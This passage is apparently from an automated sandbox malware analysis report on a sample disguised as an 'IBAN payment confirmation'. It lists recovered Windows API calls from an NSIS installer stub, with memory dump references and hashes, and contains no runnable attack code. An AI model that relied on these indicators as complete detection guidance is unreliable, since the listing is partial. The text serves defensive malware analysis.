                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                              • API String ID: 900638850-730719616
                                                                                                                              • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                                              • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                              • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                                              • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                              • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                              • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                              • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                              • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2320649405-0
                                                                                                                              • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                              • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                              • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                              • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                              • String ID: 9
                                                                                                                              • API String ID: 1149667376-2366072709
                                                                                                                              • Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                                              • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                              • Opcode Fuzzy Hash: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                                              • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3294113728-0
                                                                                                                              • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                              • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                              • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                              • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                              • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                              • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                              • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2531174081-0
                                                                                                                              • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                                              • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                              • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                                              • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                              • wsprintfW.USER32 ref: 00402D81
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                              • String ID: ... %d%%
                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                              • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                              • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                                              • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                              • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                              • GetMessagePos.USER32 ref: 00404A81
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                              • String ID: f
                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                              • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                              • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                              • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                              • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                              APIs
                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                              • wsprintfW.USER32 ref: 00402CD1
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                              • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                              • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                              • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                              • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                              • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Pointer$CountTickWrite
                                                                                                                              • String ID: x>A
                                                                                                                              • API String ID: 2146148272-3854404225
                                                                                                                              • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                              • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                              • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                              • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                                                                              APIs
                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 004061E1
                                                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                              • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 004061F5
                                                                                                                              • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403512), ref: 00406208
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                              • String ID: *?|<>/":
                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                              • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                              • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                              • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                              • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                              APIs
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252F
                                                                                                                              • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402536
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                              • String ID: 8
                                                                                                                              • API String ID: 1453599865-4194326291
                                                                                                                              • Opcode ID: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                              • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                              • Opcode Fuzzy Hash: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                              • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                              APIs
                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                                                                                                • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1941528284-0
                                                                                                                              • Opcode ID: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                              • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                              • Opcode Fuzzy Hash: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                              • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1912718029-0
                                                                                                                              • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
